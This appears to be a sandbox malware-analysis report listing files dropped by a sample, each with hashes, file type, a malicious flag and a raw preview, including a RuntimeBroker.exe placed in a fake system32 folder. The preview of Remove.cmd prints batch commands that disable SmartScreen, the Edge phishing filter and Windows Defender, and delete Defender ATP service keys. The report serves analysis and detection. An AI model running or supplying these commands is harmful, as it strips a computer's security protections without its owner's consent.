Preview:	BM~g......v...(.......:............g..................................................................................DDD@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDD@@@@@@..DDD....DDDDDD........................................DDDDDDDDDD....DDDDDDDDD........DD@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDD@@@@DDDDDDDDDD@@@@@@D..DD....DDDDDDD......................................DDDDDDDDDD....DDDDDDDDDD......D..D@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDDD@@@@@DDD..D.....DDDDDD......................................DDDDDDDDD.....DDDDDDDDD......DDD..@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDDD@@@@@@DDDD.......DDDDDD.....................................DDDDDDDDDD....DDDDDDDDDD.....DDDDD..@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDD@@@@@@DDDDDD.......DDDDDD....................................DDDDDDDDD....DDDDDDDDDD......DDDDDD..@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

C:\Users\user\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.ba1\BootstrapperApplicationData.xml

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	5906
Entropy (8bit):	3.744021143323574
Encrypted:	false
SSDEEP:	96:X0eVJbgV2VBLHeBN8n6yeHqbP0wLyc08n6qLUemc4q4I0wMLrycNLihtrtvRtrtB:X001Ks1FpIDpixLURhfzLG0LiFOBL5LC
MD5:	155839E20DA0865DBA18690138BA437C
SHA1:	78ABC1ACEAC3F094FA8C53957522F9E870059311
SHA-256:	E378898589EFDB366F46AF7F97D86A82DE88658FC6EA29250322BD881D007E4F
SHA-512:	55F5F2A1D3595FB1EE4D12C66CA27F3860FFB18DE22C2D66B8D5B77E6943234C5B1A19499244508E3191C38F7FF2DEDBE10445622E830DE479AE68ED92E0F064
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.U.x.B.l.o.c.k.e.r. .S.h.o.r.t.N.a.m.e.=.".M.i.n.i.m.u.m.O.S.L.e.v.e.l.". .T.y.p.e.=.".S.t.o.p.". .C.o.n.d.i.t.i.o.n.=.".N.O.T.(.(.V.e.r.s.i.o.n.N.T. .&.g.t.;. .v.6...1.). .O.R. .(.V.e.r.s.i.o.n.N.T. .=. .v.6...1. .A.N.D. .S.e.r.v.i.c.e.P.a.c.k.L.e.v.e.l. .&.g.t.;.=. .1.).).". .D.i.s.p.l.a.y.T.e.x.t.=.".#.l.o.c...M.i.n.i.m.u.m.O.S.L.e.v.e.l.". ./.>..... . .<.W.i.x.B.a.l.C.o.n.d.i.t.i.o.n. .C.o.n.d.i.t.i.o.n.=.".V.e.r.s.i.o.n.N.T.6.4. .&.g.t.;.=. .v.6...0. .O.R. .(.V.e.r.s.i.o.n.N.T.6.4. .=. .v.5...2. .A.N.D. .S.e.r.v.i.c.e.P.a.c.k.L.e.v.e.l. .&.g.t.;.=. .1.).". .M.e.s.s.a.g.e.=.".[.W.i.x.B.u.n.d.l.e.N.a.m.e.]. .c.a.n. .o.n.l.y. .b.e. .i.n.s.t.a.l.l.e.d. .o.n. .W.i.n.d.o.w.s. .X.P. .S.P.1. .(.

C:\Users\user\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.ba1\license.rtf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe
File Type:	Rich Text Format data, version 1, ANSI
Category:	dropped
Size (bytes):	32218
Entropy (8bit):	4.125214538902727
Encrypted:	false
SSDEEP:	384:OtWicoZ5B4femJIxQbZFSjUodgk298ANfmdkWI7Rhm+hQh0g7gsNnJ+PR9GAGyVN:JLJOFmxgPYHGkAU
MD5:	E0059DB9469E2CEF50DC794E72CAED92
SHA1:	9E3DB4D850B0B340F9FE4CBB7E1F9ED19C9B3871
SHA-256:	2C46853C88206DDF79D2E5285955FE6146CB06F77FD24FA4023501D157737CE8
SHA-512:	F482C26A0609BA563CB9E29D39AB28BE4B160C25948D9F07DBD95C32143C7CA60B3EB47A95603C0A3B8068A64EE71663BE682B2A9BA10D33F56E65A7F392FE43
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\fswiss\fprq2\fcharset129 Gulim;}{\f2\froman\fprq2\fcharset2 Symbol;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset0 Tahoma;}}..{\colortbl ;\red0\green0\blue255;\red0\green0\blue0;}..{\\generator Riched20 6.2.9200}{\\mmathPr\mnaryLim0\mdispDef1\mwrapIndent1440 }\viewkind4\uc1 ..\pard\nowidctlpar\sb120\sa120\b\f0\fs20 MICROSOFT \f1\lang1042\'bc\'d2\'c7\'c1\'c6\'ae\'bf\'fe\'be\'ee\f0 \f1\'bb\'e7\'bf\'eb\f0 \f1\'c1\'b6\'b0\'c7\f0\lang1033\par....\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120 MICROSOFT VISUAL C++ REDISTRIBUTABLE FOR VISUAL STUDIO 2013 \par....\pard\nowidctlpar\sb120\sa120\b0\f1\lang1042\'ba\'bb\f0\lang1033 \f1\lang1042\'bb\'e7\'bf\'eb\f0 \f1\'c1\'b6\'b0\'c7\'c0\'ba\f0 Microsoft Corporation(\f1\'b6\'c7\'b4\'c2\f0 \f1\'b0\'c5\'c1\'d6\f0 \f1\'c1\'f6\'bf\'aa\'bf\'a1\f0 \f1\'b5\'fb\'b6\'f3\f0 \f1\'b0\'e8\'bf\'ad\'bb\'e7\f0 \f1\'c1\'df\f0 \f1\'c7\'cf\'

C:\Users\user\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.ba1\logo.png

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe
File Type:	PNG image data, 64 x 64, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1861
Entropy (8bit):	6.868587546770907
Encrypted:	false
SSDEEP:	24:q36cnTKM/3kTIQiBmYKHeQWalGt1Sj9kYIt1uZ+bYOQe0IChR95aW:qqiTKMPuUBm7eQJGtYJM1uZCVszaW
MD5:	D6BD210F227442B3362493D046CEA233
SHA1:	FF286AC8370FC655AEA0EF35E9CF0BFCB6D698DE
SHA-256:	335A256D4779EC5DCF283D007FB56FD8211BBCAF47DCD70FE60DED6A112744EF
SHA-512:	464AAAB9E08DE610AD34B97D4076E92DC04C2CDC6669F60BFC50F0F9CE5D71C31B8943BD84CEE1A04FB9AB5BBED3442BD41D9CB21A0DD170EA97C463E1CE2B5B
Malicious:	false
Preview:	.PNG........IHDR...@...@.............sRGB.........gAMA......a.....PLTE].q^.r_.r_.s`.s`.s`.ta.ta.ub.ub.vc.vd.vd.vd.we.we.xe.xg.yg yg zh zh"zi"{j#\|i${j$\|n~n.n,.o,.p..q0.r2.s3.t5.x;.x<.y>.z?.\|B.~C.}E..F..F..H..I..J..L..O..P..W..Y..^..a..c..g..i..q..r..}.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................S......pHYs..%...%....^.....tEXtSoftware.Paint.NET v3.5.100.r.....IDATXG..iW.@...EJ.$M...`AEpG..7TpWT@\.."....(..(.._;...di:9.c>q..g....T...._...-....F..+..w.

C:\Users\user\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.ba1\thm.wxl

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe
File Type:	XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	3249
Entropy (8bit):	5.985100495461761
Encrypted:	false
SSDEEP:	48:c5DiTlO4TesKOwhDNJCkt1NhEN3m/NFNkbKNdExpVgUnqx6IPaRc0KoUK9TKz0KR:uDiTlUJJCsgqf6YVoz4uU5vI54U5TY
MD5:	B3399648C2F30930487F20B50378CEC1
SHA1:	CA7BDAB3BFEF89F6FA3C4AAF39A165D14069FC3D
SHA-256:	AD7608B87A7135F408ABF54A897A0F0920080F76013314B00D301D6264AE90B2
SHA-512:	C5B0ECF11F6DADF2E68BC3AA29CC8B24C0158DAE61FE488042D1105341773166C9EBABE43B2AF691AD4D4B458BF4A4BF9689C5722C536439CA3CDC84C0825965
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] .. ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">.. ...</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - ..... ... .. .. .... .., .., .. .... ...... ... .........../passive \| /quiet - .... .. .. UI. ..... UI ... ..... .... ..... ..... UI. .. ..... ........../norestart - .. .... .. .... ...

C:\Users\user\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.ba1\thm.xml

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5881
Entropy (8bit):	5.175177119212422
Encrypted:	false
SSDEEP:	96:wHdQG+3VzHfz96zYFJKFBiUxn7s82rf3nswO:wHAz8
MD5:	0056F10A42638EA8B4BEFC614741DDD6
SHA1:	61D488CFBEA063E028A947CB1610EE372D873C9F
SHA-256:	6B1BA0DEA830E556A58C883290FAA5D49C064E546CBFCD0451596A10CC693F87
SHA-512:	5764EC92F65ACC4EBE4DE1E2B58B8817E81E0A6BC2F6E451317347E28D66E1E6A3773D7F18BE067BBB2CB52EF1FA267754AD2BF2529286CF53730A03409D398E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="485" Height="300" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="1" Height="-24" Weight="500" Foreground="000000">Segoe UI</Font>.. <Font Id="2" Height="-22" Weight="500" Foreground="666666">Segoe UI</Font>.. <Font Id="3" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="4" Height="-12" Weight="500" Foreground="ff0000" Background="FFFFFF" Underline="yes">Segoe UI</Font>.... <Image X="11" Y="11" Width="64" Height="64" ImageFile="logo.png" Visible="yes"/>.. <Text X="80" Y="11" Width="-11" Height="64" FontId="1" Visible="yes" DisablePrefix="yes">#(loc.Title)</Text>.... <Page Name="Help">.. <Text X="11" Y="80" Width="-11" Height="30" FontId="2" DisablePrefix="yes">#(loc.HelpHeader)</T

C:\Users\user\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.ba1\wixstdba.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	120320
Entropy (8bit):	6.262646414883502
Encrypted:	false
SSDEEP:	1536:hwWD51FEDj4FBanDsDS7uO+Y3HBfPGST4BetdSnIDnDWZykftV4bvPbkYI9:NGDjrL7f35FTvtdJOZptV4bbkYS
MD5:	A52E5220EFB60813B31A82D101A97DCB
SHA1:	56E16E4DF0944CB07E73A01301886644F062D79B
SHA-256:	E7C8E7EDD9112137895820E789BAAAECA41626B01FB99FEDE82968DDB66D02CF
SHA-512:	D6565BA18B5B9795D6BDE3EF94D8F7CD77BF8BB69BA3FE7ADEFB80FC7C5D888CDFDC79238D86A0839846AEA4A1E51FC0CAED3D62F7054885E8B15FAD9F6C654E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................x=....x...... .....0.....n..x.....x8....x9....x>...Rich..........................PE..L......R...........!.....2..........1........P...............................0.......1....@.............................................l...........................0S..............................`...@............P...............................text...M0.......2.................. ..`.rdata..yd...P...f...6..............@..@.data..../..........................@....rsrc...l...........................@..@.reloc..B ......."..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.be\vcredist_x64.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	463072
Entropy (8bit):	6.936983169881084
Encrypted:	false
SSDEEP:	12288:xymOcB+pwPprnVmLmDsC+FU+ZOSzh9tz+nuE8C:xLOsDFncLmKDZOSzLF+j
MD5:	A859C6F5517C0A03A11A60EBFFBFDF09
SHA1:	330A9C1A84CD6D910720757948812196550A63B8
SHA-256:	9A66F20E46202FDF673CED6CEBE76D4BFD7FE6B62DB391C5DA9BAEF59F89CA46
SHA-512:	FF8D8C64F2804BDF90E38C0335F01B376710CEE2E41DA84D20B494909D0AA8F1643E7DF6E2A11145AFDDEA609A0473307E76839E655E8F2DD23C38A53665C9E7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.V...8...8...8.......8.....n.8......8......8...9.I.8.....l.8.......8.......8.......8.Rich..8.................PE..L....._S.....................,.......~............@..........................0......:7....@.................................t!..,........7..........0....>......$2......................... ...........@............................................text...t........................... ..`.rdata..............................@..@.data... 0...@.......,..............@....wixburn8............<..............@..@.tls.................>..............@....rsrc....7.......8...@..............@..@.reloc...B.......D...x..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe

Download File

Process:	C:\Users\user\Desktop\ywvz5i8kT9.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	915128
Entropy (8bit):	7.980473659413747
Encrypted:	false
SSDEEP:	24576:UBOldyR6ORWsaM2QROxa6jsqUENfJjNK/CG6niqiL:2KzqWsayROxa6QDENuaG+ifL
MD5:	A11A2F0CFE6D0B4C50945989DB6360CD
SHA1:	E2516FCD1573E70334C8F50BEE5241CDFDF48A00
SHA-256:	FC4623B113A1F603C0D9AD5F83130BD6DE1C62B973BE9892305132389C8588DE
SHA-512:	2652D84EB91CA7957B4FB3FF77313E5DAE978960492669242DF4F246296F1BEDAA48C0D33FFB286B2859A1B86EF5460060B551EDCA597B4EC60EE08676877C70
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................@...............................................t...........C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....C.......D...z..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Analysis.dll

Download File

Process:	C:\Users\user\Desktop\ywvz5i8kT9.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	94720
Entropy (8bit):	5.817128842471549
Encrypted:	false
SSDEEP:	1536:ZxdP4CzOeCwtI1g8gOv90bdaBsiiPxEEY/SxzuFMVeIbxT:ZxmY9tdmv90bdHiiPxEEYZSVe+F
MD5:	894D0649D55E0813BF5D0F0FB96F3C99
SHA1:	924E1BF7E68ACF393A5C424209733466EE2AC341
SHA-256:	1F4F96A4DCED09133AEE3BD028CC35B5FBD3D642190ABF5611016920CD9CE260
SHA-512:	C3E2BA8F2FFB884AC3D4327FA8FC861A594FA37C7B7D2A3402A723692F5B56ACE44E649E06B8F718978A1E423EC60189C5D1EF2E007DA23E8E866ECAEE010E89
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.L...........!.....j............... ........@.. ..............................lL....@.....................................O.................................................................................... ............... ..H............text....h... ...j.................. ..`.rsrc................l..............@..@.reloc...............p..............@..B........................H.......0...\|...................P ........................................u.o.<!.q...g...B./..........W..p..wt\..X../{$."\|=aG.....k..gaL.#o..d.$........9].,...2.&....hlm..k3Q...Ms\|..[.?..u.0..Z........o..... ..z<.X..%.23%......% ...._.%.X.a..%.c.%.X.a...&.........b.`..X%..i2.&.s....(.......0...........%(!....}......}........0...........{......0...........{......0...........-.~.....o....+.~.....o....*.0..{.............~....-\.......s1......r...pr...po<.....oL.

C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Base.dll

Download File

Process:	C:\Users\user\Desktop\ywvz5i8kT9.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	12800
Entropy (8bit):	5.314389607943967
Encrypted:	false
SSDEEP:	192:uAQ5AotUmz3wOHUtfq9ZlS8e59z6rgi4cYD7GRPD+LlAXV9:uAQTtlwOHUtS9jCz6rgtcq7s+S3
MD5:	684E717E9F7ADADC8717514AA4545614
SHA1:	F10D15359FF113CC3F4F9AE7A440DDAA9E24A128
SHA-256:	B4729BC10D4880D07E265A9DA5A739CCCF085D47A5BE5A00061B231F1E87EA34
SHA-512:	87716C823FD8EA8ACEE797D787251B317D8D9C876FAD71B65A53E74E80EDC6AB14CCF01B178343DE6B26B91D28952ACEC4E59DC06198FC6A7A5B4A2F49813668
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[.L...........!................I... ...`....@.. ....................................@.................................@I..K....`...............................H............................................... ............... ..H............text....)... ..................... ..`.rsrc........`.......,..............@..@.reloc...............0..............@..B................pI......H........)......................P ...........................................g8Q]7.....~.?...m.N[..!...^..OJ...Hf^.>...)n./.Kjh.H:.#.9...l.\|VLj.=.osR...~....R.1....[.\h.yt...yRn..A.W".._.S.T$.S..s...."..(......{......{....3..{......{.......^.u....,........(.....&...(.......(.......2.q....(.......0...........q....(.......(....(....R....c.}.......}....F.{......b.{....XB ....(.........v.-.r...ps....z.o....o.......6..t....(...+*....0..m........-.r...ps....zs.

C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Core.Extensions.dll

Download File

Process:	C:\Users\user\Desktop\ywvz5i8kT9.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.131984254200828
Encrypted:	false
SSDEEP:	192:leaXV/jf+FGKZ4vQZF/bsiQyuYvZyGZwzIbSrFf/w9p+e0Ts:AkSGKcUH8GRZwzIbSrFf/y7
MD5:	880ADF778512E564B0D8511208E161E1
SHA1:	74C30C30F7DB4C15498972F0B6E5C6F226EA8BCC
SHA-256:	FC4C18808F14FC7B215F1A101312902ED15246DEA0E62C2291096C6EC1E7CB3B
SHA-512:	7FE48FBF55DF7CBB7EC8658856C760FCC2451FAA7F44D01AD53394DA066C50A61B70E6577966D103EDADB73BBD1BBEC7B21978E432495C4428507B2000593529
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[.L...........!....."...........A... ...`....@.. ....................................@..................................A..O....`.. ............................@............................................... ............... ..H............text....!... ...".................. ..`.rsrc... ....`.......$..............@..@.reloc.............................@..B.................A......H........%..<...................P .......................................[:@..8T...%@^s.!...!...L9.# .o....r........../:....O.R...\.}.^T..I .sP...^G...y...a..a ^z..UVFF.n3.\|>..(.q.0}!...T..;.$.0..g........-.r...ps....z.o......r#..p.o....-.(....rM..p..........o.......r#..p..(....s....z.o....r#..po....o......0..Q........(.....~....r...p.rb..p(....o......rz..po....u......-.r...ps....z.....,..o ..............".#E........(!...J.o"....{....(#...*..0..7.......s......-.r..

C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Core.dll

Download File

Process:	C:\Users\user\Desktop\ywvz5i8kT9.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	5.874694853315998
Encrypted:	false
SSDEEP:	768:FCqWG3Xk7UfW0XYvJ+p93ZYX4TeqoGbbXXAdaEEQrBwkVVq3lyQPPcMAENOOlh3w:FChG30kYvK3SX4TeDzvrBwkact5OlK
MD5:	A2AA2E3F274BEBD4C74A97FBAE8BF708
SHA1:	734B827BDC136C44C712DA02CA85E4998651483F
SHA-256:	1D3A31F868CA406A6175166F21E71D3BAAD0E2BFCA9BA0123CF94D56B0E77732
SHA-512:	56E143621848D5635EADF90A83EC766CCA4B9C4A4DC1FB6063554AC726D9B403CE4C74639549F4C5A58E55BF3BD1DBB8029CAF93166737FFDA732949215B1FDD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A\.y/..y/..y/......y/..+...y/......y/..7...y/......y/...T..y/..y...y/......y/......y/.Rich.y/.................PE..d....[.L.........." .....L..........lW..............................................o.....@..................................................(..x....`.......P...............p..(...`s...............................................p..............\|s..H............text....I.......J.................. ..`.nep....P....`.......N.............. ..`.rdata..R....p.......P..............@..@.data........@......................@....pdata.......P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Packets.dll

Download File

Process:	C:\Users\user\Desktop\ywvz5i8kT9.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	157184
Entropy (8bit):	6.14425563449471
Encrypted:	false
SSDEEP:	3072:k87g3nxFesDDVmvOzL8TSC0SfjBjBEVJutmWW+fmA9sQ0irHz+B5351:kAcisDsc+7Btptmn+fmZQ01
MD5:	C71E098BD2CBE86A4E5FC736AEA39C7F
SHA1:	B4687D64AF4D2F0C2886F7E40B3C391210D11AAA
SHA-256:	5D7282C91056383B33B91F1CEBF3A3FB9C9F7D1172CCE2B9D3B03370078F494F
SHA-512:	74264CEA4A0A621C1B5FE56C3D2ABB94D5847841CCFCF98E5D9F8219C5B74F4781E3FD9FAC342FDBB2457D320348517E231B4C0A0CA52F7DCE22C7F513DE6F15
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[.L...........!.....^..........>\|... ........@.. ...............................l....@..................................{..K...................................D{............................................... ............... ..H............text...D\... ...^.................. ..`.rsrc................`..............@..@.reloc...............d..............@..B................ \|......H..........p...................P ......................................"..-f.\|....]..?.m??A0#J.;>,d}C8;O..)..JL<<...H).......`....(.@.U...R.(.A.;`ONL..K_..../.6jl...&.f.>....Na...7-.T\...>....(.....~.....~......{....R.(.....t....o......6.-....o....6..u....o....F.(.....7...o....F.(.....7...o......0..C........J.X..J.3....%J%..XT......E............+.(....(.........JY(......0............%J%..XT..(.....:.(......}....^.s..........s.............0..........

C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\Remove.cmd

Download File

Process:	C:\Users\user\Desktop\ywvz5i8kT9.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1675
Entropy (8bit):	5.225512855438009
Encrypted:	false
SSDEEP:	48:lFqG98MnZC16Gm8OVDFVhYr9vVfvHHlHfylpt2XLmjH:lF2MZmA8kDFXYPHHlHKlpt2a
MD5:	1E7A65AA3B0121F450FECB0F3478E68D
SHA1:	A3B12C25A1BABBA301E1515DDFE20666CDF8A564
SHA-256:	D94383FDBEDBEB6EF9278BD3625DD5ED27ADD11D1B11F9EDDB0FCF6C2A0EA5F9
SHA-512:	6A18EBF202179C821F6286AADBF126EC4D0D170894B7C7FD4EE7A21FC6F1512F0E168430D997EA02A919623850681317B9973CCFFC4EA18A80F9A281D4D52135
Malicious:	false
Preview:	@echo off....reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f..reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f..reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f..reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f..reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f..reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f..reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DontReportInfectionInformation /t REG_DWORD /d 1 /f..reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /f..reg delete "HKLM\SYSTEM\Curre

C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\RuntimeBroker.exe

Download File

Process:	C:\Users\user\Desktop\ywvz5i8kT9.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	26624
Entropy (8bit):	5.631136529342772
Encrypted:	false
SSDEEP:	768:EK7pxDmbd10n9zOnF8ngzfF7MZgMvHgyAtw:EcvDmB18pOn5f1jMvAtw
MD5:	E2435C4F79D16BD6B22A16D6C118F17A
SHA1:	AD213BA6510AE274F8A3932569BE6329C013F98A
SHA-256:	736BBA37A80B299662D4DFBC9EDE02C3C3F2002C31B3852A02FAA0441093E0A1
SHA-512:	D449605C1F2109373F13EC5832541C81CD77442F2E64198A3FB82D457EE635E03BF4E8C6003656BBC848ADA77113944492077D00B19802657B16D123141160BB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...6.7..........."...0..`............... .....@..... ....................................@...@......@............... ..............................................................\|}..8............................................................ ..H............text...&^... ...`.................. ..`.rsrc................b..............@..@........................................H........>...=......=....\|...............................................0...........r...p}......}.....(........(............+............}........X.......i2........s....s.......o......o.....(....o.....r...p(............+'..........o.......o.......o.........X.......i2.r...p(............8...............r!..p( .......r7..p( .......(!.......,'...r...p( .......(".......,....(#........(!.......9.......r...p( .......(".......,....(#.......r...p( .......(".......,...(#......r...p( .......("

C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\install_wim_tweak.exe

Download File

Process:	C:\Users\user\Desktop\ywvz5i8kT9.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	45568
Entropy (8bit):	5.390180731462457
Encrypted:	false
SSDEEP:	768:2YXjpZtla2TkbZQG+udRn1d699cD/vBiLeiQw:7XjLa2TkbZQTudZjKI/w9B
MD5:	BA352663C76C86C10A8D5C7B7A47F3C5
SHA1:	61337AEC0DAD3D993F862A2D6499A185CBE46431
SHA-256:	AFBF22880D0129F8B11B1A5876F175C874F52C8572CB5C4BEDA3C528241A8E6C
SHA-512:	FE563A98A4AA7913D4E58BE874669F3294F07954FBE53D4B599B294310BA83181FF0D1FAD947D23678CC62AFCA2A26AEE39217D38A662B4AEE097135488A706D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......U.........."...0..j...F......b.... ........@.. ....................... ............`.....................................O........B........................................................................... ............... ..H............text....h... ...j.................. ..`.rsrc....B.......D...l..............@..@.reloc..............................@..B................D.......H....... 7...O..........................................................0............(....~....(....(........1...%....(....(.........~.....?o....,&r...p(......(....r...p(....(.....(....~.....co....,a~.....co....(....-.~.....co....rf..p( ........+,..(....rh..p(!.....(....("...rf..p( ........(....~.....oo....,N(#...($...r...p( ..........(....r[..p(!...(....~....r...pr...po%..............~.....ho....,.......~.....oo....:j...~.....po....:......(....r...p(!.....(....("...r...p(

C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\system.bin

Download File

Process:	C:\Windows\SysWOW64\RuntimeBroker.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	16
Entropy (8bit):	2.7806390622295662
Encrypted:	false
SSDEEP:	3:NbzLUXmn:1UXmn
MD5:	DE26651E17BC36A81DE77C5920C052C5
SHA1:	9D43E9F9375FF7B40F66B0500DC5F28A94C3A6C3
SHA-256:	F49B797C96E041915B83CAD93B974E5E427DE679B84903D7154A68DD72AF79B0
